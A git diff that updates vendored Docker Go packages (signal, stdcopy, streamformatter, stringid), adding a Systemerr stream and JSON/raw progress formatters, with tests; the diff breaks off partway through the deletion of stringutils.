diff --git a/vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go b/vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go
new file mode 100644
index 0000000000..14d1543117
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go
@@ -0,0 +1,82 @@
+// +build linux
+
+package signal // import "github.com/docker/docker/pkg/signal"
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"syscall"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func buildTestBinary(t *testing.T, tmpdir string, prefix string) (string, string) {
+	tmpDir, err := ioutil.TempDir(tmpdir, prefix)
+	assert.NilError(t, err)
+	exePath := tmpDir + "/" + prefix
+	wd, _ := os.Getwd()
+	testHelperCode := wd + "/testfiles/main.go"
+	cmd := exec.Command("go", "build", "-o", exePath, testHelperCode)
+	err = cmd.Run()
+	assert.NilError(t, err)
+	return exePath, tmpDir
+}
+
+func TestTrap(t *testing.T) {
+	var sigmap = []struct {
+		name     string
+		signal   os.Signal
+		multiple bool
+	}{
+		{"TERM", syscall.SIGTERM, false},
+		{"QUIT", syscall.SIGQUIT, true},
+		{"INT", os.Interrupt, false},
+		{"TERM", syscall.SIGTERM, true},
+		{"INT", os.Interrupt, true},
+	}
+	exePath, tmpDir := buildTestBinary(t, "", "main")
+	defer os.RemoveAll(tmpDir)
+
+	for _, v := range sigmap {
+		cmd := exec.Command(exePath)
+		cmd.Env = append(os.Environ(), fmt.Sprintf("SIGNAL_TYPE=%s", v.name))
+		if v.multiple {
+			cmd.Env = append(cmd.Env, "IF_MULTIPLE=1")
+		}
+		err := cmd.Start()
+		assert.NilError(t, err)
+		err = cmd.Wait()
+		if e, ok := err.(*exec.ExitError); ok {
+			code := e.Sys().(syscall.WaitStatus).ExitStatus()
+			if v.multiple {
+				assert.Check(t, is.DeepEqual(128+int(v.signal.(syscall.Signal)), code))
+			} else {
+				assert.Check(t, is.Equal(99, code))
+			}
+			continue
+		}
+		t.Fatal("process didn't end with any error")
+	}
+
+}
+
+func TestDumpStacks(t *testing.T) {
+	directory, err := ioutil.TempDir("", "test-dump-tasks")
+	assert.Check(t, err)
+	defer os.RemoveAll(directory)
+	dumpPath, err := DumpStacks(directory)
+	assert.Check(t, err)
+	readFile, _ := ioutil.ReadFile(dumpPath)
+	fileData := string(readFile)
+	assert.Check(t, is.Contains(fileData, "goroutine"))
+}
+
+func TestDumpStacksWithEmptyInput(t *testing.T) {
+	path, err := DumpStacks("")
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(os.Stderr.Name(), path))
+}
diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go
index be20765457..8f6e0a737a 100644
--- a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go
+++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go
@@ -1,4 +1,4 @@
-package stdcopy
+package stdcopy // import "github.com/docker/docker/pkg/stdcopy"
 
 import (
 	"bytes"
@@ -20,6 +20,9 @@ const (
 	Stdout
 	// Stderr represents standard error steam type.
 	Stderr
+	// Systemerr represents errors originating from the system that make it
+	// into the multiplexed stream.
+	Systemerr
 
 	stdWriterPrefixLen = 8
 	stdWriterFdIndex   = 0
@@ -115,8 +118,9 @@ func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error)
 			}
 		}
 
+		stream := StdType(buf[stdWriterFdIndex])
 		// Check the first byte to know where to write
-		switch StdType(buf[stdWriterFdIndex]) {
+		switch stream {
 		case Stdin:
 			fallthrough
 		case Stdout:
@@ -125,6 +129,11 @@ func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error)
 		case Stderr:
 			// Write on stderr
 			out = dsterr
+		case Systemerr:
+			// If we're on Systemerr, we won't write anywhere.
+			// NB: if this code changes later, make sure you don't try to write
+			// to outstream if Systemerr is the stream
+			out = nil
 		default:
 			return 0, fmt.Errorf("Unrecognized input header: %d", buf[stdWriterFdIndex])
 		}
@@ -155,11 +164,18 @@ func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error)
 			}
 		}
 
+		// we might have an error from the source mixed up in our multiplexed
+		// stream. if we do, return it.
+		if stream == Systemerr {
+			return written, fmt.Errorf("error from daemon in stream: %s", string(buf[stdWriterPrefixLen:frameSize+stdWriterPrefixLen]))
+		}
+
 		// Write the retrieved frame (without header)
 		nw, ew = out.Write(buf[stdWriterPrefixLen : frameSize+stdWriterPrefixLen])
 		if ew != nil {
 			return 0, ew
 		}
+
 		// If the frame has not been fully written: error
 		if nw != frameSize {
 			return 0, io.ErrShortWrite
diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go
index 3137a75239..63edb855e5 100644
--- a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go
+++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go
@@ -1,4 +1,4 @@
-package stdcopy
+package stdcopy // import "github.com/docker/docker/pkg/stdcopy"
 
 import (
 	"bytes"
@@ -16,14 +16,14 @@ func TestNewStdWriter(t *testing.T) {
 	}
 }
 
-func TestWriteWithUnitializedStdWriter(t *testing.T) {
+func TestWriteWithUninitializedStdWriter(t *testing.T) {
 	writer := stdWriter{
 		Writer: nil,
 		prefix: byte(Stdout),
 	}
 	n, err := writer.Write([]byte("Something here"))
 	if n != 0 || err == nil {
-		t.Fatalf("Should fail when given an uncomplete or uninitialized StdWriter")
+		t.Fatalf("Should fail when given an incomplete or uninitialized StdWriter")
 	}
 }
 
@@ -246,6 +246,35 @@ func TestStdCopyDetectsNotFullyWrittenFrames(t *testing.T) {
 	}
 }
 
+// TestStdCopyReturnsErrorFromSystem tests that StdCopy correctly returns an
+// error, when that error is muxed into the Systemerr stream.
+func TestStdCopyReturnsErrorFromSystem(t *testing.T) {
+	// write in the basic messages, just so there's some fluff in there
+	stdOutBytes := []byte(strings.Repeat("o", startingBufLen))
+	stdErrBytes := []byte(strings.Repeat("e", startingBufLen))
+	buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes)
+	if err != nil {
+		t.Fatal(err)
+	}
+	// add in an error message on the Systemerr stream
+	systemErrBytes := []byte(strings.Repeat("S", startingBufLen))
+	systemWriter := NewStdWriter(buffer, Systemerr)
+	_, err = systemWriter.Write(systemErrBytes)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// now copy and demux. we should expect an error containing the string we
+	// wrote out
+	_, err = StdCopy(ioutil.Discard, ioutil.Discard, buffer)
+	if err == nil {
+		t.Fatal("expected error, got none")
+	}
+	if !strings.Contains(err.Error(), string(systemErrBytes)) {
+		t.Fatal("expected error to contain message")
+	}
+}
+
 func BenchmarkWrite(b *testing.B) {
 	w := NewStdWriter(ioutil.Discard, Stdout)
 	data := []byte("Test line for testing stdwriter performance\n")
diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go
index ce6ea79dee..2b5e713040 100644
--- a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go
+++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go
@@ -1,5 +1,5 @@
 // Package streamformatter provides helper functions to format a stream.
-package streamformatter
+package streamformatter // import "github.com/docker/docker/pkg/streamformatter"
 
 import (
 	"encoding/json"
@@ -10,91 +10,76 @@ import (
 	"github.com/docker/docker/pkg/progress"
 )
 
-// StreamFormatter formats a stream, optionally using JSON.
-type StreamFormatter struct {
-	json bool
-}
-
-// NewStreamFormatter returns a simple StreamFormatter
-func NewStreamFormatter() *StreamFormatter {
-	return &StreamFormatter{}
-}
-
-// NewJSONStreamFormatter returns a StreamFormatter configured to stream json
-func NewJSONStreamFormatter() *StreamFormatter {
-	return &StreamFormatter{true}
-}
-
 const streamNewline = "\r\n"
 
-var streamNewlineBytes = []byte(streamNewline)
+type jsonProgressFormatter struct{}
 
-// FormatStream formats the specified stream.
-func (sf *StreamFormatter) FormatStream(str string) []byte {
-	if sf.json {
-		b, err := json.Marshal(&jsonmessage.JSONMessage{Stream: str})
-		if err != nil {
-			return sf.FormatError(err)
-		}
-		return append(b, streamNewlineBytes...)
-	}
-	return []byte(str + "\r")
+func appendNewline(source []byte) []byte {
+	return append(source, []byte(streamNewline)...)
 }
 
 // FormatStatus formats the specified objects according to the specified format (and id).
-func (sf *StreamFormatter) FormatStatus(id, format string, a ...interface{}) []byte {
+func FormatStatus(id, format string, a ...interface{}) []byte {
 	str := fmt.Sprintf(format, a...)
-	if sf.json {
-		b, err := json.Marshal(&jsonmessage.JSONMessage{ID: id, Status: str})
-		if err != nil {
-			return sf.FormatError(err)
-		}
-		return append(b, streamNewlineBytes...)
+	b, err := json.Marshal(&jsonmessage.JSONMessage{ID: id, Status: str})
+	if err != nil {
+		return FormatError(err)
 	}
-	return []byte(str + streamNewline)
+	return appendNewline(b)
 }
 
-// FormatError formats the specified error.
-func (sf *StreamFormatter) FormatError(err error) []byte {
-	if sf.json {
-		jsonError, ok := err.(*jsonmessage.JSONError)
-		if !ok {
-			jsonError = &jsonmessage.JSONError{Message: err.Error()}
-		}
-		if b, err := json.Marshal(&jsonmessage.JSONMessage{Error: jsonError, ErrorMessage: err.Error()}); err == nil {
-			return append(b, streamNewlineBytes...)
-		}
-		return []byte("{\"error\":\"format error\"}" + streamNewline)
+// FormatError formats the error as a JSON object
+func FormatError(err error) []byte {
+	jsonError, ok := err.(*jsonmessage.JSONError)
+	if !ok {
+		jsonError = &jsonmessage.JSONError{Message: err.Error()}
 	}
-	return []byte("Error: " + err.Error() + streamNewline)
+	if b, err := json.Marshal(&jsonmessage.JSONMessage{Error: jsonError, ErrorMessage: err.Error()}); err == nil {
+		return appendNewline(b)
+	}
+	return []byte(`{"error":"format error"}` + streamNewline)
+}
+
+func (sf *jsonProgressFormatter) formatStatus(id, format string, a ...interface{}) []byte {
+	return FormatStatus(id, format, a...)
 }
 
-// FormatProgress formats the progress information for a specified action.
-func (sf *StreamFormatter) FormatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte {
+// formatProgress formats the progress information for a specified action.
+func (sf *jsonProgressFormatter) formatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte {
 	if progress == nil {
 		progress = &jsonmessage.JSONProgress{}
 	}
-	if sf.json {
-		var auxJSON *json.RawMessage
-		if aux != nil {
-			auxJSONBytes, err := json.Marshal(aux)
-			if err != nil {
-				return nil
-			}
-			auxJSON = new(json.RawMessage)
-			*auxJSON = auxJSONBytes
-		}
-		b, err := json.Marshal(&jsonmessage.JSONMessage{
-			Status:          action,
-			ProgressMessage: progress.String(),
-			Progress:        progress,
-			ID:              id,
-			Aux:             auxJSON,
-		})
+	var auxJSON *json.RawMessage
+	if aux != nil {
+		auxJSONBytes, err := json.Marshal(aux)
 		if err != nil {
 			return nil
 		}
-		return append(b, streamNewlineBytes...)
+		auxJSON = new(json.RawMessage)
+		*auxJSON = auxJSONBytes
+	}
+	b, err := json.Marshal(&jsonmessage.JSONMessage{
+		Status:          action,
+		ProgressMessage: progress.String(),
+		Progress:        progress,
+		ID:              id,
+		Aux:             auxJSON,
+	})
+	if err != nil {
+		return nil
+	}
+	return appendNewline(b)
+}
+
+type rawProgressFormatter struct{}
+
+func (sf *rawProgressFormatter) formatStatus(id, format string, a ...interface{}) []byte {
+	return []byte(fmt.Sprintf(format, a...) + streamNewline)
+}
+
+func (sf *rawProgressFormatter) formatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte {
+	if progress == nil {
+		progress = &jsonmessage.JSONProgress{}
 	}
 	endl := "\r"
 	if progress.String() == "" {
@@ -105,16 +90,23 @@ func (sf *StreamFormatter) FormatProgress(id, action string, progress *jsonmessa
 
 // NewProgressOutput returns a progress.Output object that can be passed to
 // progress.NewProgressReader.
-func (sf *StreamFormatter) NewProgressOutput(out io.Writer, newLines bool) progress.Output {
-	return &progressOutput{
-		sf:       sf,
-		out:      out,
-		newLines: newLines,
-	}
+func NewProgressOutput(out io.Writer) progress.Output {
+	return &progressOutput{sf: &rawProgressFormatter{}, out: out, newLines: true}
+}
+
+// NewJSONProgressOutput returns a progress.Output that that formats output
+// using JSON objects
+func NewJSONProgressOutput(out io.Writer, newLines bool) progress.Output {
+	return &progressOutput{sf: &jsonProgressFormatter{}, out: out, newLines: newLines}
+}
+
+type formatProgress interface {
+	formatStatus(id, format string, a ...interface{}) []byte
+	formatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte
 }
 
 type progressOutput struct {
-	sf       *StreamFormatter
+	sf       formatProgress
 	out      io.Writer
 	newLines bool
 }
@@ -123,10 +115,10 @@ type progressOutput struct {
 func (out *progressOutput) WriteProgress(prog progress.Progress) error {
 	var formatted []byte
 	if prog.Message != "" {
-		formatted = out.sf.FormatStatus(prog.ID, prog.Message)
+		formatted = out.sf.formatStatus(prog.ID, prog.Message)
 	} else {
-		jsonProgress := jsonmessage.JSONProgress{Current: prog.Current, Total: prog.Total}
-		formatted = out.sf.FormatProgress(prog.ID, prog.Action, &jsonProgress, prog.Aux)
+		jsonProgress := jsonmessage.JSONProgress{Current: prog.Current, Total: prog.Total, HideCounts: prog.HideCounts, Units: prog.Units}
+		formatted = out.sf.formatProgress(prog.ID, prog.Action, &jsonProgress, prog.Aux)
 	}
 	_, err := out.out.Write(formatted)
 	if err != nil {
@@ -134,39 +126,34 @@ func (out *progressOutput) WriteProgress(prog progress.Progress) error {
 	}
 
 	if out.newLines && prog.LastUpdate {
-		_, err = out.out.Write(out.sf.FormatStatus("", ""))
+		_, err = out.out.Write(out.sf.formatStatus("", ""))
 		return err
 	}
 
 	return nil
 }
 
-// StdoutFormatter is a streamFormatter that writes to the standard output.
-type StdoutFormatter struct {
+// AuxFormatter is a streamFormatter that writes aux progress messages
+type AuxFormatter struct {
 	io.Writer
-	*StreamFormatter
 }
 
-func (sf *StdoutFormatter) Write(buf []byte) (int, error) {
-	formattedBuf := sf.StreamFormatter.FormatStream(string(buf))
-	n, err := sf.Writer.Write(formattedBuf)
-	if n != len(formattedBuf) {
-		return n, io.ErrShortWrite
+// Emit emits the given interface as an aux progress message
+func (sf *AuxFormatter) Emit(aux interface{}) error {
+	auxJSONBytes, err := json.Marshal(aux)
+	if err != nil {
+		return err
 	}
-	return len(buf), err
-}
-
-// StderrFormatter is a streamFormatter that writes to the standard error.
-type StderrFormatter struct {
-	io.Writer
-	*StreamFormatter
-}
-
-func (sf *StderrFormatter) Write(buf []byte) (int, error) {
-	formattedBuf := sf.StreamFormatter.FormatStream("\033[91m" + string(buf) + "\033[0m")
-	n, err := sf.Writer.Write(formattedBuf)
-	if n != len(formattedBuf) {
-		return n, io.ErrShortWrite
+	auxJSON := new(json.RawMessage)
+	*auxJSON = auxJSONBytes
+	msgJSON, err := json.Marshal(&jsonmessage.JSONMessage{Aux: auxJSON})
+	if err != nil {
+		return err
+	}
+	msgJSON = appendNewline(msgJSON)
+	n, err := sf.Writer.Write(msgJSON)
+	if n != len(msgJSON) {
+		return io.ErrShortWrite
 	}
-	return len(buf), err
+	return err
 }
diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go
index 93ec90f5f7..4399a6509b 100644
--- a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go
+++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go
@@ -1,108 +1,112 @@
-package streamformatter
+package streamformatter // import "github.com/docker/docker/pkg/streamformatter"
 
 import (
+	"bytes"
 	"encoding/json"
 	"errors"
-	"reflect"
 	"strings"
 	"testing"
 
 	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/google/go-cmp/cmp"
+	"github.com/google/go-cmp/cmp/cmpopts"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
-func TestFormatStream(t *testing.T) {
-	sf := NewStreamFormatter()
-	res := sf.FormatStream("stream")
-	if string(res) != "stream"+"\r" {
-		t.Fatalf("%q", res)
-	}
-}
-
-func TestFormatJSONStatus(t *testing.T) {
-	sf := NewStreamFormatter()
-	res := sf.FormatStatus("ID", "%s%d", "a", 1)
-	if string(res) != "a1\r\n" {
-		t.Fatalf("%q", res)
-	}
+func TestRawProgressFormatterFormatStatus(t *testing.T) {
+	sf := rawProgressFormatter{}
+	res := sf.formatStatus("ID", "%s%d", "a", 1)
+	assert.Check(t, is.Equal("a1\r\n", string(res)))
 }
 
-func TestFormatSimpleError(t *testing.T) {
-	sf := NewStreamFormatter()
-	res := sf.FormatError(errors.New("Error for formatter"))
-	if string(res) != "Error: Error for formatter\r\n" {
-		t.Fatalf("%q", res)
-	}
-}
-
-func TestJSONFormatStream(t *testing.T) {
-	sf := NewJSONStreamFormatter()
-	res := sf.FormatStream("stream")
-	if string(res) != `{"stream":"stream"}`+"\r\n" {
-		t.Fatalf("%q", res)
+func TestRawProgressFormatterFormatProgress(t *testing.T) {
+	sf := rawProgressFormatter{}
+	jsonProgress := &jsonmessage.JSONProgress{
+		Current: 15,
+		Total:   30,
+		Start:   1,
 	}
+	res := sf.formatProgress("id", "action", jsonProgress, nil)
+	out := string(res)
+	assert.Check(t, strings.HasPrefix(out, "action [===="))
+	assert.Check(t, is.Contains(out, "15B/30B"))
+	assert.Check(t, strings.HasSuffix(out, "\r"))
 }
 
-func TestJSONFormatStatus(t *testing.T) {
-	sf := NewJSONStreamFormatter()
-	res := sf.FormatStatus("ID", "%s%d", "a", 1)
-	if string(res) != `{"status":"a1","id":"ID"}`+"\r\n" {
-		t.Fatalf("%q", res)
-	}
+func TestFormatStatus(t *testing.T) {
+	res := FormatStatus("ID", "%s%d", "a", 1)
+	expected := `{"status":"a1","id":"ID"}` + streamNewline
+	assert.Check(t, is.Equal(expected, string(res)))
 }
 
-func TestJSONFormatSimpleError(t *testing.T) {
-	sf := NewJSONStreamFormatter()
-	res := sf.FormatError(errors.New("Error for formatter"))
-	if string(res) != `{"errorDetail":{"message":"Error for formatter"},"error":"Error for formatter"}`+"\r\n" {
-		t.Fatalf("%q", res)
-	}
+func TestFormatError(t *testing.T) {
+	res := FormatError(errors.New("Error for formatter"))
+	expected := `{"errorDetail":{"message":"Error for formatter"},"error":"Error for formatter"}` + "\r\n"
+	assert.Check(t, is.Equal(expected, string(res)))
 }
 
-func TestJSONFormatJSONError(t *testing.T) {
-	sf := NewJSONStreamFormatter()
+func TestFormatJSONError(t *testing.T) {
 	err := &jsonmessage.JSONError{Code: 50, Message: "Json error"}
-	res := sf.FormatError(err)
-	if string(res) != `{"errorDetail":{"code":50,"message":"Json error"},"error":"Json error"}`+"\r\n" {
-		t.Fatalf("%q", res)
-	}
+	res := FormatError(err)
+	expected := `{"errorDetail":{"code":50,"message":"Json error"},"error":"Json error"}` + streamNewline
+	assert.Check(t, is.Equal(expected, string(res)))
 }
 
-func TestJSONFormatProgress(t *testing.T) {
-	sf := NewJSONStreamFormatter()
-	progress := &jsonmessage.JSONProgress{
+func TestJsonProgressFormatterFormatProgress(t *testing.T) {
+	sf := &jsonProgressFormatter{}
+	jsonProgress := &jsonmessage.JSONProgress{
 		Current: 15,
 		Total:   30,
 		Start:   1,
 	}
-	res := sf.FormatProgress("id", "action", progress, nil)
+	aux := "aux message"
+	res := sf.formatProgress("id", "action", jsonProgress, aux)
 	msg := &jsonmessage.JSONMessage{}
-	if err := json.Unmarshal(res, msg); err != nil {
-		t.Fatal(err)
+
+	assert.NilError(t, json.Unmarshal(res, msg))
+
+	rawAux := json.RawMessage(`"` + aux + `"`)
+	expected := &jsonmessage.JSONMessage{
+		ID:       "id",
+		Status:   "action",
+		Aux:      &rawAux,
+		Progress: jsonProgress,
 	}
-	if msg.ID != "id" {
-		t.Fatalf("ID must be 'id', got: %s", msg.ID)
+	assert.DeepEqual(t, msg, expected, cmpJSONMessageOpt())
+}
+
+func cmpJSONMessageOpt() cmp.Option {
+	progressMessagePath := func(path cmp.Path) bool {
+		return path.String() == "ProgressMessage"
 	}
-	if msg.Status != "action" {
-		t.Fatalf("Status must be 'action', got: %s", msg.Status)
+	return cmp.Options{
+		cmpopts.IgnoreUnexported(jsonmessage.JSONProgress{}),
+		// Ignore deprecated property that is a derivative of Progress
+		cmp.FilterPath(progressMessagePath, cmp.Ignore()),
 	}
+}
 
-	// The progress will always be in the format of:
-	// [=========================>                         ]     15 B/30 B 404933h7m11s
-	// The last entry '404933h7m11s' is the timeLeftBox.
-	// However, the timeLeftBox field may change as progress.String() depends on time.Now().
-	// Therefore, we have to strip the timeLeftBox from the strings to do the comparison.
+func TestJsonProgressFormatterFormatStatus(t *testing.T) {
+	sf := jsonProgressFormatter{}
+	res := sf.formatStatus("ID", "%s%d", "a", 1)
+	assert.Check(t, is.Equal(`{"status":"a1","id":"ID"}`+streamNewline, string(res)))
+}
 
-	// Compare the progress strings before the timeLeftBox
-	expectedProgress := "[=========================>                         ]     15 B/30 B"
-	// if terminal column is <= 110, expectedProgressShort is expected.
-	expectedProgressShort := "    15 B/30 B"
-	if !(strings.HasPrefix(msg.ProgressMessage, expectedProgress) ||
-		strings.HasPrefix(msg.ProgressMessage, expectedProgressShort)) {
-		t.Fatalf("ProgressMessage without the timeLeftBox must be %s or %s, got: %s",
-			expectedProgress, expectedProgressShort, msg.ProgressMessage)
-	}
+func TestNewJSONProgressOutput(t *testing.T) {
+	b := bytes.Buffer{}
+	b.Write(FormatStatus("id", "Downloading"))
+	_ = NewJSONProgressOutput(&b, false)
+	assert.Check(t, is.Equal(`{"status":"Downloading","id":"id"}`+streamNewline, b.String()))
+}
 
-	if !reflect.DeepEqual(msg.Progress, progress) {
-		t.Fatal("Original progress not equals progress from FormatProgress")
-	}
+func TestAuxFormatterEmit(t *testing.T) {
+	b := bytes.Buffer{}
+	aux := &AuxFormatter{Writer: &b}
+	sampleAux := &struct {
+		Data string
+	}{"Additional data"}
+	err := aux.Emit(sampleAux)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(`{"aux":{"Data":"Additional data"}}`+streamNewline, b.String()))
 }
diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go
new file mode 100644
index 0000000000..1473ed974a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go
@@ -0,0 +1,47 @@
+package streamformatter // import "github.com/docker/docker/pkg/streamformatter"
+
+import (
+	"encoding/json"
+	"io"
+
+	"github.com/docker/docker/pkg/jsonmessage"
+)
+
+type streamWriter struct {
+	io.Writer
+	lineFormat func([]byte) string
+}
+
+func (sw *streamWriter) Write(buf []byte) (int, error) {
+	formattedBuf := sw.format(buf)
+	n, err := sw.Writer.Write(formattedBuf)
+	if n != len(formattedBuf) {
+		return n, io.ErrShortWrite
+	}
+	return len(buf), err
+}
+
+func (sw *streamWriter) format(buf []byte) []byte {
+	msg := &jsonmessage.JSONMessage{Stream: sw.lineFormat(buf)}
+	b, err := json.Marshal(msg)
+	if err != nil {
+		return FormatError(err)
+	}
+	return appendNewline(b)
+}
+
+// NewStdoutWriter returns a writer which formats the output as json message
+// representing stdout lines
+func NewStdoutWriter(out io.Writer) io.Writer {
+	return &streamWriter{Writer: out, lineFormat: func(buf []byte) string {
+		return string(buf)
+	}}
+}
+
+// NewStderrWriter returns a writer which formats the output as json message
+// representing stderr lines
+func NewStderrWriter(out io.Writer) io.Writer {
+	return &streamWriter{Writer: out, lineFormat: func(buf []byte) string {
+		return "\033[91m" + string(buf) + "\033[0m"
+	}}
+}
diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go
new file mode 100644
index 0000000000..5b679f2cf4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go
@@ -0,0 +1,35 @@
+package streamformatter // import "github.com/docker/docker/pkg/streamformatter"
+
+import (
+	"bytes"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestStreamWriterStdout(t *testing.T) {
+	buffer := &bytes.Buffer{}
+	content := "content"
+	sw := NewStdoutWriter(buffer)
+	size, err := sw.Write([]byte(content))
+
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(len(content), size))
+
+	expected := `{"stream":"content"}` + streamNewline
+	assert.Check(t, is.Equal(expected, buffer.String()))
+}
+
+func TestStreamWriterStderr(t *testing.T) {
+	buffer := &bytes.Buffer{}
+	content := "content"
+	sw := NewStderrWriter(buffer)
+	size, err := sw.Write([]byte(content))
+
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(len(content), size))
+
+	expected := `{"stream":"\u001b[91mcontent\u001b[0m"}` + streamNewline
+	assert.Check(t, is.Equal(expected, buffer.String()))
+}
diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid.go b/vendor/github.com/docker/docker/pkg/stringid/stringid.go
index fa35d8bad5..fa7d9166eb 100644
--- a/vendor/github.com/docker/docker/pkg/stringid/stringid.go
+++ b/vendor/github.com/docker/docker/pkg/stringid/stringid.go
@@ -1,20 +1,26 @@
 // Package stringid provides helper functions for dealing with string identifiers
-package stringid
+package stringid // import "github.com/docker/docker/pkg/stringid"
 
 import (
-	"crypto/rand"
+	cryptorand "crypto/rand"
 	"encoding/hex"
+	"fmt"
 	"io"
+	"math"
+	"math/big"
+	"math/rand"
 	"regexp"
 	"strconv"
 	"strings"
-
-	"github.com/docker/docker/pkg/random"
+	"time"
 )
 
 const shortLen = 12
 
-var validShortID = regexp.MustCompile("^[a-z0-9]{12}$")
+var (
+	validShortID = regexp.MustCompile("^[a-f0-9]{12}$")
+	validHex     = regexp.MustCompile(`^[a-f0-9]{64}$`)
+)
 
 // IsShortID determines if an arbitrary string *looks like* a short ID.
 func IsShortID(id string) bool {
@@ -35,12 +41,8 @@ func TruncateID(id string) string {
 	return id
 }
 
-func generateID(crypto bool) string {
+func generateID(r io.Reader) string {
 	b := make([]byte, 32)
-	r := random.Reader
-	if crypto {
-		r = rand.Reader
-	}
 	for {
 		if _, err := io.ReadFull(r, b); err != nil {
 			panic(err) // This shouldn't happen
@@ -58,12 +60,40 @@ func generateID(crypto bool) string {
 
 // GenerateRandomID returns a unique id.
 func GenerateRandomID() string {
-	return generateID(true)
+	return generateID(cryptorand.Reader)
 }
 
 // GenerateNonCryptoID generates unique id without using cryptographically
 // secure sources of random.
 // It helps you to save entropy.
 func GenerateNonCryptoID() string {
-	return generateID(false)
+	return generateID(readerFunc(rand.Read))
+}
+
+// ValidateID checks whether an ID string is a valid image ID.
+func ValidateID(id string) error {
+	if ok := validHex.MatchString(id); !ok {
+		return fmt.Errorf("image ID %q is invalid", id)
+	}
+	return nil
+}
+
+func init() {
+	// safely set the seed globally so we generate random ids. Tries to use a
+	// crypto seed before falling back to time.
+	var seed int64
+	if cryptoseed, err := cryptorand.Int(cryptorand.Reader, big.NewInt(math.MaxInt64)); err != nil {
+		// This should not happen, but worst-case fallback to time-based seed.
+		seed = time.Now().UnixNano()
+	} else {
+		seed = cryptoseed.Int64()
+	}
+
+	rand.Seed(seed)
+}
+
+type readerFunc func(p []byte) (int, error)
+
+func (fn readerFunc) Read(p []byte) (int, error) {
+	return fn(p)
 }
diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go
index 8ff6b4383d..a7ccd5faae 100644
--- a/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go
+++ b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go
@@ -1,4 +1,4 @@
-package stringid
+package stringid // import "github.com/docker/docker/pkg/stringid"
 
 import (
 	"strings"
diff --git a/vendor/github.com/docker/docker/pkg/stringutils/README.md b/vendor/github.com/docker/docker/pkg/stringutils/README.md
deleted file mode 100644
index b3e454573c..0000000000
--- a/vendor/github.com/docker/docker/pkg/stringutils/README.md
+++ /dev/null
@@ -1 +0,0 @@
-This package provides helper functions for dealing with strings
diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go
deleted file mode 100644
index 8e1c812d7a..0000000000
--- a/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go
+++ /dev/null
@@ -1,101 +0,0 @@
-// Package stringutils provides helper functions for dealing with strings.
-package stringutils
-
-import (
-	"bytes"
-	"math/rand"
-	"strings"
-
-	"github.com/docker/docker/pkg/random"
-)
-
-// GenerateRandomAlphaOnlyString generates an alphabetical random string with length n.
-func GenerateRandomAlphaOnlyString(n int) string {
-	// make a really long string
-	letters := []byte("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
-	b := make([]byte, n)
-	for i := range b {
-		b[i] = letters[random.Rand.Intn(len(letters))]
-	}
-	return string(b)
-}
-
-// GenerateRandomASCIIString generates an ASCII random string with length n.
-func GenerateRandomASCIIString(n int) string {
-	chars := "abcdefghijklmnopqrstuvwxyz" +
-		"ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
-		"~!@#$%^&*()-_+={}[]\\|<,>.?/\"';:` "
-	res := make([]byte, n)
-	for i := 0; i < n; i++ {
-		res[i] = chars[rand.Intn(len(chars))]
-	}
-	return string(res)
-}
-
-// Ellipsis truncates a string to fit within maxlen, and appends ellipsis (...).
-// For maxlen of 3 and lower, no ellipsis is appended.
-func Ellipsis(s string, maxlen int) string {
-	r := []rune(s)
-	if len(r) <= maxlen {
